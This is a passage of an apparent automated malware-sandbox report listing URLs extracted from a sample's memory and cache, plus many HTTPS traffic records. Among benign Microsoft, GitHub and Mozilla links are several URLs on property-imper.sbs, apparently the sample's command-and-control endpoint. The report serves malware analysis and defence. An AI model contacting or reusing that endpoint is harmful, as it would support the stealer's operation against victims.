              Source: file.exe, 00000000.00000003.2117386035.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117288244.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117465467.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://channel9.msdn.com/
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://client-api.arkoselabs.com/v2/api.js
              Source: file.exe, 00000000.00000003.2117386035.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117288244.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117465467.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2117386035.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117288244.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117465467.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2117386035.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117288244.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117465467.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_126.6.drString found in binary or memory: https://github.com/Thraka
              Source: chromecache_126.6.drString found in binary or memory: https://github.com/Youssef1313
              Source: chromecache_126.6.drString found in binary or memory: https://github.com/adegeo
              Source: chromecache_126.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
              Source: chromecache_126.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
              Source: chromecache_126.6.drString found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
              Source: chromecache_126.6.drString found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://github.com/dotnet/try
              Source: chromecache_126.6.drString found in binary or memory: https://github.com/gewarren
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://github.com/jonschlinkert/is-plain-object
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://github.com/js-cookie/js-cookie
              Source: chromecache_126.6.drString found in binary or memory: https://github.com/mairaw
              Source: chromecache_126.6.drString found in binary or memory: https://github.com/nschonni
              Source: chromecache_126.6.drString found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://learn-video.azurefd.net/vod/player
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://octokit.github.io/rest.js/#throttling
              Source: file.exe, 00000000.00000003.2363703471.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
              Source: file.exe, 00000000.00000003.2363785293.000000000160C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2341264233.0000000001615000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2426176594.000000000160D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2363703471.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2238498213.0000000001631000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2257950127.0000000001631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
              Source: file.exe, 00000000.00000003.2363785293.000000000160C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2363703471.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api#
              Source: file.exe, 00000000.00000003.2238498213.0000000001631000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2257950127.0000000001631000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiE
              Source: file.exe, 00000000.00000002.2547545469.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2363703471.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/l
              Source: file.exe, 00000000.00000003.2363703471.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/lv
              Source: file.exe, 00000000.00000003.2363703471.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/n&
              Source: file.exe, 00000000.00000002.2547545469.00000000015A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api
              Source: chromecache_106.6.drString found in binary or memory: https://schema.org
              Source: file.exe, 00000000.00000003.2184541181.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2184541181.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05
              Source: chromecache_106.6.drString found in binary or memory: https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9
              Source: file.exe, 00000000.00000003.2117386035.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117288244.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117465467.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2117386035.0000000005D78000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117288244.0000000005D7B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2117465467.0000000005D78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_118.6.dr, chromecache_106.6.drString found in binary or memory: https://www.linkedin.com/cws/share?url=$
              Source: file.exe, 00000000.00000003.2184541181.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: file.exe, 00000000.00000003.2184541181.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: file.exe, 00000000.00000003.2184541181.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: file.exe, 00000000.00000003.2184541181.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2184541181.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: file.exe, 00000000.00000003.2184541181.0000000005E65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49980
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
              Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50004 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
              Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
              Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
              Source: unknownNetwork traffic detected: HTTP traffic on port 50013 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
              Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
              Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
